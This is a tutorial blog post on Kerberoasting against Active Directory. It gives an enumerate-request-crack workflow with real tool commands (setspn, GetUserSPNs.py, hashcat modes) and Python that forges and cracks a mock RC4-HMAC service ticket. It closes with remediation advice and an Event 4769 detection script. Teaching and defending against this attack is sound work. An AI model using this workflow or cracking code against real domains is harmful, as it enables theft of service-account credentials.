Kerberoasting

November 14, 2021 0 By Ryan Barger

Credit to Tim Medin for his DerbyCon presentation on this technique.

Kerberoasting gives an attacker who holds any valid domain credential a way to crack the passwords of service accounts offline. The KDC will issue a service ticket for any account that has a Service Principal Name (SPN) registered, and that ticket is encrypted with a key derived from the account's password, so it can be carried off and attacked with no further contact with the domain. Success almost always comes down to the target account having a weak password; it is also far more practical when the ticket uses RC4-HMAC (etype 23), whose key is the unsalted NT hash, than when it uses AES.

Kerberos Authentication

Kerberos authentication involves a series of requests between a client, the Key Distribution Center (KDC), and the target server. Throughout this process, specific parts of each message are encrypted with keys derived from a password: the user's, the service account's, or the krbtgt account's. For the RC4-HMAC encryption type (etype 23) the key is simply the account's NT hash; for the AES types it is a PBKDF2 derivation of the password salted with the realm and principal name. A rudimentary description of the process follows:

  1. The client sends the KDC a timestamp encrypted with a key derived from the user's password (pre-authentication, in the AS-REQ).
  2. The KDC decrypts it and replies (AS-REP) with a Ticket Granting Ticket (TGT) encrypted with the krbtgt account's key, so only the KDC can read it, together with a session key encrypted for the user.
  3. The client presents the TGT and asks the KDC (TGS-REQ) for a ticket to a network service, identified by its Service Principal Name (SPN).
  4. The KDC replies (TGS-REP) with a service ticket encrypted with a key derived from the password of the account the SPN is registered to. The KDC does not check whether the requester is allowed to use the service; any authenticated user receives this ticket.
  5. The client presents the ticket to the service (AP-REQ), which decrypts it with its own key.

Exploitation

Step four hands the client a blob encrypted with a key derived from the service account's password, and the KDC performs no authorization check before issuing it, so any authenticated domain user can request such a ticket for any SPN they can enumerate. The attack therefore has three parts: enumerate accounts with SPNs (an LDAP query, `setspn -Q */*`, or Impacket's GetUserSPNs.py), request a service ticket for each (GetUserSPNs.py -request, or PowerShell's System.IdentityModel KerberosRequestorSecurityToken on a Windows host), and crack the encrypted part offline with Hashcat (mode 13100 for RC4-HMAC, 19600 and 19700 for AES128 and AES256) or John the Ripper. Note that Impacket obtains the tickets; the cracking is done by Hashcat or John. Worthwhile targets are user accounts that carry SPNs; computer accounts also have SPNs, but their passwords are long, random and rotated automatically, so cracking them is hopeless. A weak, human-chosen password on a service account is usually recovered within minutes.
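To make step four and the cracking step concrete, here is an added example (not code from the original post) that builds a mock RC4-HMAC service ticket for a made-up account and then cracks it from a wordlist, reimplementing the RFC 4757 check that hashcat performs for every guess in mode 13100. The realm CORP.LOCAL, the SPN, the account svc_sql and its password are assumptions, and the ticket plaintext is a placeholder rather than a real ASN.1 EncTicketPart; everything else is the actual algorithm.

```python
"""Forge one RC4-HMAC (etype 23) service ticket and crack it offline.

Added example, not from the original post: reimplements RFC 4757 (NT hash =
MD4 of the UTF-16LE password, HMAC-MD5 key derivation, RC4) so the check
hashcat performs per guess in mode 13100 can be read end to end. The realm,
SPN, account name and password are made up.
"""
import hashlib
import hmac
import os
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_TICKET = 2  # RFC 4120: a TGS-REP ticket is encrypted under the service key, usage 2

def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK

def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib often lacks it under OpenSSL 3."""
    bit_len = len(data) * 8
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", bit_len)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    rounds = (  # (boolean function, additive constant, shifts, message word order)
        (lambda x, y, z: (x & y) | (~x & z), 0, (3, 7, 11, 19), tuple(range(16))),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999, (3, 5, 9, 13),
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1, (3, 9, 11, 15),
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)),
    )
    for off in range(0, len(data), 64):
        words = struct.unpack("<16I", data[off:off + 64])
        v = h[:]
        for fn, const, shifts, order in rounds:
            for i, idx in enumerate(order):
                j = (-i) % 4  # the word being updated cycles a, d, c, b
                b, c, d = v[(j + 1) % 4], v[(j + 2) % 4], v[(j + 3) % 4]
                v[j] = _rotl((v[j] + fn(b, c, d) + words[idx] + const) & MASK, shifts[i % 4])
        h = [(h[n] + v[n]) & MASK for n in range(4)]
    return struct.pack("<4I", *h)

def nt_hash(password: str) -> bytes:
    """The RC4-HMAC long-term key: unsalted MD4 of the UTF-16LE password."""
    return md4(password.encode("utf-16-le"))

def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def _hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()

def rc4_hmac_encrypt(key: bytes, plaintext: bytes, usage: int = KEY_USAGE_TICKET) -> bytes:
    """RFC 4757 encrypt: checksum || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    edata = os.urandom(8) + plaintext       # 8-byte random confounder
    checksum = _hmac_md5(k1, edata)         # K2 == K1 for non-export keys
    return checksum + rc4(_hmac_md5(k1, checksum), edata)

def rc4_hmac_verify(key: bytes, blob: bytes, usage: int = KEY_USAGE_TICKET) -> bool:
    """One trial decryption; this is the entire cost of testing a password guess."""
    checksum, cipher = blob[:16], blob[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    edata = rc4(_hmac_md5(k1, checksum), cipher)
    return hmac.compare_digest(_hmac_md5(k1, edata), checksum)

def to_hashcat(user: str, realm: str, spn: str, blob: bytes) -> str:
    """hashcat mode 13100 line: $krb5tgs$23$*user$realm$spn*$checksum$edata"""
    return f"$krb5tgs$23$*{user}${realm}${spn}*${blob[:16].hex()}${blob[16:].hex()}"

def kerberoast(line: str, wordlist):
    """Return the first wordlist entry whose NT hash verifies the ticket, else None."""
    if not line.startswith("$krb5tgs$23$"):
        raise ValueError("only RC4-HMAC handled; AES tickets need PBKDF2 per guess")
    _, checksum_hex, edata_hex = line.rsplit("$", 2)
    blob = bytes.fromhex(checksum_hex) + bytes.fromhex(edata_hex)
    for candidate in wordlist:
        if rc4_hmac_verify(nt_hash(candidate), blob):
            return candidate
    return None

# Constructed sample: svc_sql carries an SPN and a dictionary password, so any
# domain user can obtain this blob with a TGS-REQ and crack it offline.
SERVICE_PASSWORD = "Summer2021!"
SAMPLE_TICKET = to_hashcat("svc_sql", "CORP.LOCAL", "MSSQLSvc/db01.corp.local:1433",
                           rc4_hmac_encrypt(nt_hash(SERVICE_PASSWORD), b"<EncTicketPart placeholder>"))
WORDLIST = ["password", "Welcome1", "P@ssw0rd", "Summer2021!", "Autumn2021!"]
```

Each guess costs one MD4, three HMAC-MD5 computations and one RC4 pass, with no salt, which is why RC4 tickets crack at hundreds of millions of guesses per second on a GPU. The AES etypes replace the single MD4 with PBKDF2-HMAC-SHA1 at 4096 iterations plus an AES-CTS decryption, so the same wordlist costs orders of magnitude more per guess; that difference is the whole argument for AES-only service accounts.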

Remediation

The most readily available defense against Kerberoasting is a strong password policy for every account that carries an SPN: long, random passwords (25 characters or more), or better, Group Managed Service Accounts (gMSA), whose passwords are long, random and rotated automatically by Active Directory. Where the service supports it, restrict the account to AES (msDS-SupportedEncryptionTypes) so the KDC stops issuing RC4 tickets for it; an attacker then pays PBKDF2 at 4096 iterations for every guess instead of a single MD4. To monitor enforcement, defenders can run the same enumeration and ticket request against their own domain on a schedule and crack the results with a wordlist; anything that falls is a finding. On the detection side, Security Event ID 4769 with TicketEncryptionType 0x17 for a service name that is neither krbtgt nor a computer account is the classic indicator, especially a burst of requests for many different SPNs from one account in a short window, and a decoy account with an SPN that nothing legitimately uses turns that signal into a near-certain alert.
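As an added example of the monitoring side (not code from the original post), the following hunts over constructed Windows Security Event ID 4769 records for RC4 service-ticket requests and for one requester pulling tickets for many SPNs in a short window. The field names mirror the real 4769 event (TargetUserName, ServiceName, TicketEncryptionType, IpAddress); the records, the CORP.LOCAL accounts, the addresses and the five-SPNs-in-five-minutes threshold are all assumptions made for the example.

```python
"""Hunt for Kerberoasting in Windows Security Event ID 4769 records.

Added example, not from the original post. Field names mirror the real
4769 event (TargetUserName, ServiceName, TicketEncryptionType, IpAddress);
the records, hosts and thresholds below are constructed for the example.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17                      # TicketEncryptionType value for etype 23
BURST_WINDOW = timedelta(minutes=5)
BURST_THRESHOLD = 5                  # distinct SPNs per requester inside the window

def ev(time, user, service, etype, ip):
    return {"TimeCreated": time, "TargetUserName": user, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip}

# Constructed sample log: alice is normal traffic, bob pulls tickets for five
# SPNs in three seconds with RC4, carol asks for a single RC4 ticket.
EVENTS = [
    ev("2021-11-14T09:00:01", "alice@CORP.LOCAL", "svc_sql", 0x12, "10.1.1.5"),  # AES ticket
    ev("2021-11-14T09:00:02", "alice@CORP.LOCAL", "krbtgt", 0x17, "10.1.1.5"),   # TGT traffic
    ev("2021-11-14T09:00:03", "alice@CORP.LOCAL", "FS01$", 0x17, "10.1.1.5"),    # computer account
    ev("2021-11-14T09:15:00", "bob@CORP.LOCAL", "svc_sql", 0x17, "10.1.2.9"),
    ev("2021-11-14T09:15:01", "bob@CORP.LOCAL", "svc_web", 0x17, "10.1.2.9"),
    ev("2021-11-14T09:15:01", "bob@CORP.LOCAL", "svc_backup", 0x17, "10.1.2.9"),
    ev("2021-11-14T09:15:02", "bob@CORP.LOCAL", "svc_sccm", 0x17, "10.1.2.9"),
    ev("2021-11-14T09:15:03", "bob@CORP.LOCAL", "svc_adfs", 0x17, "10.1.2.9"),
    ev("2021-11-14T09:30:00", "carol@CORP.LOCAL", "svc_sql", 0x17, "10.1.3.4"),
]

def is_roastable(e):
    """RC4 ticket for a user-style service account. krbtgt and computer
    accounts ($) are excluded: their keys are random, so nobody cracks them."""
    svc = e["ServiceName"]
    return e["TicketEncryptionType"] == RC4_HMAC and svc != "krbtgt" and not svc.endswith("$")

def rc4_requests(events):
    """Every RC4 service-ticket request worth a look, as (user, service, ip)."""
    return [(e["TargetUserName"], e["ServiceName"], e["IpAddress"]) for e in events if is_roastable(e)]

def bursts(events, window=BURST_WINDOW, threshold=BURST_THRESHOLD):
    """Requesters that pulled >= threshold distinct SPNs within one window."""
    by_user = defaultdict(list)
    for e in events:
        if is_roastable(e):
            by_user[e["TargetUserName"]].append((datetime.fromisoformat(e["TimeCreated"]), e["ServiceName"]))
    flagged = {}
    for user, reqs in by_user.items():
        reqs.sort()
        for i, (t0, _) in enumerate(reqs):
            spns = {svc for t, svc in reqs[i:] if t - t0 <= window}
            if len(spns) >= threshold:
                flagged[user] = sorted(spns)
                break
    return flagged
```

A single RC4 request such as carol's is low-severity on its own, because legacy clients and services that still negotiate RC4 produce the same event; the burst from bob is what a Kerberoasting tool looks like, since it requests a ticket for every SPN it enumerated. Tuning the window and threshold to the environment, and adding a decoy SPN account whose name alone is an alert, is what makes this rule usable in practice.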